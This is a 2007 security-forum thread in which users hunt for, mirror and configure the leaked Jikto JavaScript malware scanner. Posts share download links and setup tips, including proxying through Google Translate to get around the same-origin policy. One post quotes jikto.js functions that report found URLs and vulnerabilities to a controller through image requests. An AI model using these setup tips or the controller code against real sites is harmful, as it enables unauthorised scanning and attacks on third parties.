Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 12Next
Current Page: 1 of 2
jikto source code
Posted by: blad3
Date: April 01, 2007 07:04AM

Hi guys,

I was listening to the latest Security Now! (with Steve Gibson; hey, this guy has good intentions :P) and he mentioned about jikto source code being leaked out.
I would like to take a look. Anybody has a copy?

Options: ReplyQuote
Re: jikto source code
Date: April 01, 2007 08:27AM

Is this it? http://www.pentest.it/jikto/jikto.js

Options: ReplyQuote
Re: jikto source code
Date: April 01, 2007 08:28AM

http://www.pentest.it/jikto/ other files

Options: ReplyQuote
Re: jikto source code
Posted by: Anonymous User
Date: April 01, 2007 02:11PM

damnit - down already. did you backup the files?

Options: ReplyQuote
Re: jikto source code
Posted by: Henaro
Date: April 01, 2007 02:14PM

I'd like to see the source also. Anyone have it?

Options: ReplyQuote
Re: jikto source code
Posted by: Anonymous User
Date: April 01, 2007 02:16PM

1st of april??

Options: ReplyQuote
Re: jikto source code
Date: April 01, 2007 06:36PM

I have a backup I thought they might take it down. Seeing they were asking people to take it off their sites.

Options: ReplyQuote
Re: jikto source code
Date: April 01, 2007 06:46PM

[URL REMOVED] Please look elswhere

btw this is not an April Fools Joke. Tell if if server is not responding or not. Its on my home server so kinda unreliable. Make backup because will take server down after you check.



Edited 1 time(s). Last edit at 04/06/2007 01:04AM by CrYpTiC_MauleR.

Options: ReplyQuote
Re: jikto source code
Date: April 01, 2007 08:10PM

Fukken Saved! I was wondering when the actual source would be available as it was supposed to be out around the 25th, and I knew they had already presented it to the public.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: jikto source code
Date: April 01, 2007 09:39PM

Anyone else want a copy before I take it down?

Options: ReplyQuote
Re: jikto source code
Posted by: rsnake
Date: April 01, 2007 11:32PM

Interesting how the jikto control was changed! Already being used by a number of people I see.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: jikto source code
Date: April 02, 2007 12:07AM

Taking my server down, anyone want copy PM me.

UPDATE: please read http://sla.ckers.org/forum/read.php?11,9275,9326#msg-9559



Edited 1 time(s). Last edit at 04/06/2007 01:05AM by CrYpTiC_MauleR.

Options: ReplyQuote
Re: jikto source code
Posted by: blad3
Date: April 02, 2007 02:33AM

Here are the slides
http://www.spidynamics.com/spilabs/education/presentations/Javascript_malware.pdf

Options: ReplyQuote
Re: jikto source code
Posted by: busin3ss
Date: April 02, 2007 01:43PM

Anyone playing with this tool? I need some guidance :)

Options: ReplyQuote
Re: jikto source code
Posted by: blad3
Date: April 02, 2007 01:56PM

I did some tests. What problems do you have?

Options: ReplyQuote
Re: jikto source code
Posted by: busin3ss
Date: April 02, 2007 02:04PM

Well there are four files, I just coded a quick php file to replace control control.txt and changed the var GUIURL.

I'm trying without using a "proxy", I'm scanning a site in the same domain (To bypass the Same Origin Policy)... But I get this weird javascript errors

Is there any chance that I can see a working demo blad3? Just to see how your are testing

Options: ReplyQuote
Re: jikto source code
Posted by: blad3
Date: April 02, 2007 02:14PM

wtf?
http://blogs.zdnet.com/security/?p=146

Options: ReplyQuote
Re: jikto source code
Posted by: busin3ss
Date: April 02, 2007 02:37PM

Ryan Naraine Wrote:
-------------------------------------------------------
> The code has since been posted to the Sla.ckers.org forum.
> Hacker RSnake discusses nippets of the code, which can be
> used to hunt for common security holes and then connect
> back to its controller for instructions on which Web sites
> to hit and >which flaws to look for.

Hahahaha...



Edited 1 time(s). Last edit at 04/02/2007 02:38PM by busin3ss.

Options: ReplyQuote
Re: jikto source code
Posted by: blad3
Date: April 02, 2007 02:51PM

busin3ss, I'm testing on localhost like you did.
You are most definitely doing something wrong, maybe didn't used rot13 or entered some bad URL or path or ?
The script is working pretty nice, I'm watching the requests/responses with Firebug.
You can even insert breakpoints and debug the code if you want. Firebug rocks!

Options: ReplyQuote
Re: jikto source code
Posted by: busin3ss
Date: April 02, 2007 03:02PM

Downloading Firebug right know...

For those who want to download the source code (Since all mirrors are offline):

http://busin3ss.name/jikto-in-the-wild



Edited 1 time(s). Last edit at 04/02/2007 03:03PM by busin3ss.

Options: ReplyQuote
Re: jikto source code
Date: April 02, 2007 03:03PM

>> wtf?
>> [blogs.zdnet.com]

oops



Edited 1 time(s). Last edit at 04/02/2007 03:03PM by CrYpTiC_MauleR.

Options: ReplyQuote
Re: jikto source code
Posted by: Acidus
Date: April 02, 2007 03:38PM

You can run it against localhost sites to test. You'll need to edit the sendRequest() function. The global variable "prefix" holds the URL prefixing for the proxying site. The code in the isLinkgood() function should prevent Jikto from getting out of control and scanning pages that aren't on localhost

Options: ReplyQuote
Re: jikto source code
Posted by: Delixe
Date: April 02, 2007 04:52PM

Doesn't really do anything, I change the URL and nothing really occurs. Loads the site in an iframe and...nothing.

Options: ReplyQuote
Re: jikto source code
Posted by: Beetlejuice
Date: April 03, 2007 01:56PM

I missed the download window. Anyone has the whole lot available for me, pls?

Options: ReplyQuote
Re: jikto source code
Posted by: Anonymous User
Date: April 03, 2007 04:15PM

For those with reading disablilites:
http://busin3ss.name/wp-content/uploads/2007/04/jitko.zip

Greetings,
.mario



Edited 1 time(s). Last edit at 04/03/2007 04:16PM by .mario.

Options: ReplyQuote
Re: jikto source code
Date: April 05, 2007 11:50PM

Note to everyone who comes to this post PMing me I am not responding to PMs for Jikto source anymore. If you can't be smart and use Google to find mirrors or even bother to read the posts on this page which clearly provides a working link to a copy of Jikto then I will ignore you. Come on people do we need our hands held for everything?



Edited 1 time(s). Last edit at 04/06/2007 01:06AM by CrYpTiC_MauleR.

Options: ReplyQuote
Re: jikto source code
Posted by: thrill
Date: April 06, 2007 12:36AM

@CM

Edit the post? ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: jikto source code
Posted by: busin3ss
Date: April 06, 2007 01:01PM

Mirror or Jikto -> http://busin3ss.name/jikto-in-the-wild

Options: ReplyQuote
Re: jikto source code
Date: April 06, 2007 01:37PM

Heh hopefully they know how to click a link. I mean the amount of people who PMed me even after you posted the link was ridiculous. Either they can't read or don't know how to use Google. I was asking myself this, if they cant even Google or read this page then how will they know how to use Jikto? I say someone make a post with links to known mirrors a sticky.

Options: ReplyQuote
Re: jikto source code
Posted by: Royal2000H
Date: April 08, 2007 06:36AM

I got jikto and everything

I edited the jikto.js to direct to my control.txt

the-cloak banned me within seconds so im using google translate even though im testing pages in the same domain

with firebug i can see for example
http://www.testdomainiamusing.com/jikto/control.txt1&url=http%3A//www.testdomainiamusing.com%3A80/gallery/details.php%3Fimage_id%3D30&method=GET

looking at the code in jikto.js:

function reportURL(method, url) {
var i = new Image();
i.src = GUIURL + "1&url=" + escape(url) + "&method=" + escape(method);
}

function reportVuln(method, url, sev, title, req, resp) {
var i = new Image();
i.src = GUIURL + "2&url="

which means that unless I see "http://www.testdomainiamusing.com/jikto/control.txt2&url="
it did not find a vulnerability

i guess that's the way to do it without a controller, but someone above me said they wrote up a controller, can you post the source to the controller?

or maybe im using the tool incorrectly?

Options: ReplyQuote
Pages: 12Next
Current Page: 1 of 2


Sorry, only registered users may post in this forum.